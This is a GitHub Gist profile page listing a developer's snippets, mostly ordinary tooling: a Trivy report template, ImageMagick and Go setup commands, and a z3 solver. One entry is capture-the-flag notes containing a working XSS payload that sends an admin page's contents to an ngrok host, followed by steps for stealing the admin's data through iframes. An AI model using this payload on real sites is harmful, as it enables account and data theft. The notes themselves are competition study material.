Skip to content

Instantly share code, notes, and snippets.

View diofeher's full-sized avatar
🎯
Focusing

Diógenes Fernandes diofeher

🎯
Focusing
150 followers · 33 following
View GitHub Profile
@diofeher
diofeher / application.md
Last active November 22, 2022 22:07
Connecting a Google Form to create issues in a Github project
@diofeher
diofeher / security-gcp-certificate.md
Created December 3, 2020 10:52
Preparation to Security Certification on GCP
@diofeher
diofeher / trivy.tpl
Last active November 19, 2020 16:30
{{- /* Template based on https://docs.gitlab.com/ee/user/application_security/container_scanning/#reports-json-format */ -}}
{
"version": "11.0.0",
"vulnerabilities": [
{{- $t_first := true }}
{{- range . }}
{{- $target := .Target }}
{{- range .Vulnerabilities -}}
{{- if $t_first -}}
{{- $t_first = false -}}
@diofeher
diofeher / imagemagick.sh
Created September 22, 2020 13:03
ImageMagick Useful commands
# concatenate two images with different sizes
convert image1.jpeg image2.jpeg -gravity Center -resize 800x200 +append output.jpeg
@diofeher
diofeher / installing_go.sh
Last active June 30, 2020 14:00
# Installing Go environment on MAC + Visual Studio Code + Oh my ZSH
brew install go
cat <<EOT >> $HOME/.zshrc
export GOROOT="/usr/local/Cellar/go/1.14.4/libexec/"
export GOPATH="$HOME/workspace/go"
export PATH="${PATH}:${GOPATH}:${GOPATH}/bin"
EOT
source $HOME/.zshrc
@diofeher
diofeher / desafio_logica.py
Created April 30, 2020 17:13
from z3 import Solver, Ints, Or, And, Not, sat
x, y, z = Ints('x y z')
s = Solver()
s.add(x >= 0, x <= 9)
s.add(y >= 0, y <= 9)
s.add(z >= 0, z <= 9)
@diofeher
diofeher / mynotes-bytebandits.md
Last active April 12, 2020 15:52

First - XSS on the User

<http://g<!s://q?<!-<[<script>top.admin.location='https://196cffb1.ngrok.io/?data='+JSON.stringify(top.admin.document.getElementsByClassName('is-4')[0].textContent.trim());/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(13);/*](http://g)->a>

Second - Create a page with two iframes. With one, you stay with the admin logged in and with the other one:

  1. Log out
  2. Login with your XSS user
  3. Control the admin iframe with XSS and exfiltrate the data
@diofeher
diofeher / PENTEST_Guide.md
Last active April 11, 2020 14:21
@diofeher
diofeher / chW00t.c
Last active March 29, 2020 06:40
/*
* ----------------------------------------------------------------------------
* "THE BEER-WARE LICENSE" (Revision 42):
* Balazs Bucsay wrote this file. As long as you retain this notice you
* can do whatever you want with this stuff. If we meet some day, and you think
* this stuff is worth it, you can buy me a beer in return. chroot@rycon.hu
* (Lincense is stolen from Poul-Henning Kamp)
* ----------------------------------------------------------------------------
*/
@diofeher
diofeher / xss.pwnfunctions.md
Last active November 7, 2020 15:55